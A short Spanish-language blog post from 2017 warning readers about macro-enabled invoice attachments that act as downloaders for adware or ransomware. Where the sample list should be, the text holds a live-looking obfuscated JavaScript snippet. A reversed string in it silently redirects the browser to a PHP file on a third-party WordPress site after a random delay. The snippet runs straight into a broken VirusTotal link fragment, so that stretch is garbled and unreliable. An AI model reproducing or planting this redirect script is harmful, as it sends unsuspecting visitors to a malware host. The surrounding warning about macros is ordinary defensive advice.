AMPLIACION DEL ANALISIS DE LAS MUESTRAS DE FICHEROS ANEXADOS A LOS ULTIMOS MAILS RECIBIDOS

Los ficheros anexados a los mails que indicabamos en el post anterior corresponden a malwares que se activan si se ejecutan con las macros habilitadas, resultando ser:

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/es/file/ac877abc950e5ade62f28b19900e27fdeb979d32c8684c4b8c5361d8f3db6b5c/analysis/1503558485/” target=”_blank” rel=”noopener”>2017 Fra-2094.xls —> Mas de lo mismo que el anterior, segun puede verse en el informe

Hay que remarcar que estos ficheros han llegado anexados a mails sobre FACTURAS, los cuales son comunes actualmente cuando la mayoría de facturas no se envian por correo tradicional en papel, sino por mail, mediante correo electrónico, lo cual facilita la propagación de este tipo de virus y si se ejecuta pensando que es una factura real, sobretodo NO HABILITAR LAS MACROS, que es lo que provoca la ejecución del virus, que en este caso se trata de un DOWNLOADER que descarga lo que tiene programado, desde un simple adware, hasta un ransomware de los que codifican los datos de las unidades compartidas, incluido el servidor.

Mucho cuidado con ello, que lo malo abunda !

saludos

ms, 24-8-2017